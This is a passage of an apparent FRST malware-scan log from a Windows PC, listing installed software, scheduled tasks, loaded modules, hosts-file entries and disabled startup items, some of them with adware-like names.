RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&amp;installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 23:13 - 2015-09-10 01:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2016-04-11 19:16 - 2016-04-05 22:12 - 02140824 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-11 19:16 - 2016-04-05 22:12 - 00097944 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: ) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
